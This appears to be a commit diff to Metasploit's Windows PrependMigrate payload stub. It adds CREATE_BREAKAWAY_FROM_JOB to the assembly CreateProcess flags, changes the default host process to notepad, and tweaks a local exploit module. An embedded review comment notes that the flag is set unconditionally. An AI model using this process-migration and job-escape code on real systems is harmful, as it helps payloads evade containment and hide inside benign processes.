Update the Ruby code, the template DLLs and prepend_migrate.rb to pass the CREATE_BREAKAWAY_FROM_JOB flag to CreateProcess, so that the new process breaks away from the job when the job has the JOB_OBJECT_LIMIT_BREAKAWAY_OK limit set (i.e. allows breakaway).

This commit is contained in:
Grant Willcox 2022-03-23 17:47:25 -05:00
parent 715082a960
commit b1ce05f97c
No known key found for this signature in database
GPG Key ID: D35E05C0F2B81E83
4 changed files with 5 additions and 5 deletions

BIN
data/templates/template_x64_windows.dll Executable file → Normal file

Binary file not shown.

BIN
data/templates/template_x86_windows.dll Executable file → Normal file

Binary file not shown.


@ -57,7 +57,7 @@ module Msf::Payload::Windows::PrependMigrate
#
def prepend_migrate(buf)
payloadsize = "0x%04x" % buf.length
procname = datastore['PrependMigrateProc'] || 'rundll32'
procname = datastore['PrependMigrateProc'] || 'notepad'
# Prepare instructions to get address of block_api into ebp
block_api_start = <<-EOS
@ -221,7 +221,7 @@ module Msf::Payload::Windows::PrependMigrate
xor ebx,ebx
push ebx ; lpCurrentDirectory
push ebx ; lpEnvironment
push 0x08000004 ; dwCreationFlags CREATE_NO_WINDOW | CREATE_SUSPENDED
push 0x09000004 ; dwCreationFlags CREATE_NO_WINDOW | CREATE_SUSPENDED | CREATE_BREAKAWAY_FROM_JOB
push ebx ; bInHeritHandles
push ebx ; lpThreadAttributes
push ebx ; lpProcessAttributes
@ -300,7 +300,7 @@ module Msf::Payload::Windows::PrependMigrate
def prepend_migrate_64(buf)
payloadsize = "0x%04x" % buf.length
procname = datastore['PrependMigrateProc'] || 'rundll32'
procname = datastore['PrependMigrateProc'] || 'notepad'
# Prepare instructions to get address of block_api into ebp
block_api_start = <<-EOS
@ -467,7 +467,7 @@ module Msf::Payload::Windows::PrependMigrate
xor rcx,rcx
push rcx ; lpCurrentDirectory
push rcx ; lpEnvironment
push 0x08000004 ; dwCreationFlags CREATE_NO_WINDOW | CREATE_SUSPENDED
push 0x09000004 ; dwCreationFlags CREATE_NO_WINDOW | CREATE_SUSPENDED | CREATE_BREAKAWAY_FROM_JOB
push rcx ; bInHeritHandles
mov r9, rcx ; lpThreadAttributes
mov r8, rcx ; lpProcessAttributes
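Review bot: The new dwCreationFlags value 0x09000004 in the second and fourth hunks sets CREATE_BREAKAWAY_FROM_JOB unconditionally, while the commit description says the breakaway should only happen when the job has JOB_OBJECT_LIMIT_BREAKAWAY_OK set; nothing in these hunks checks that. When the calling process is in a job that does not permit breakaway, CreateProcess rejects this flag with ERROR_ACCESS_DENIED, so the prepend-migrate stub now fails where the previous 0x08000004 value would have created the suspended child inside the job; what the stub does after a failed CreateProcess is outside these hunks, so that path is worth confirming. At minimum the assembly comment should record the failure mode, e.g. `push 0x09000004 ; dwCreationFlags CREATE_NO_WINDOW | CREATE_SUSPENDED | CREATE_BREAKAWAY_FROM_JOB (CreateProcess fails with ERROR_ACCESS_DENIED if the job lacks JOB_OBJECT_LIMIT_BREAKAWAY_OK)`, and if that failure is not acceptable the stub would need to fall back to the old flags. The first and third hunks also change the default PrependMigrateProc from rundll32 to notepad, which the description does not mention. Both prepend_migrate and prepend_migrate_64 continue outside the hunks.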


@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Local
'Grant Willcox' # Metasploit module + Tweaks to PoC
],
'Arch' => [ ARCH_X64 ],
'Platform' => 'windows',
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [
[ 'Windows 11', { 'Arch' => ARCH_X64 } ]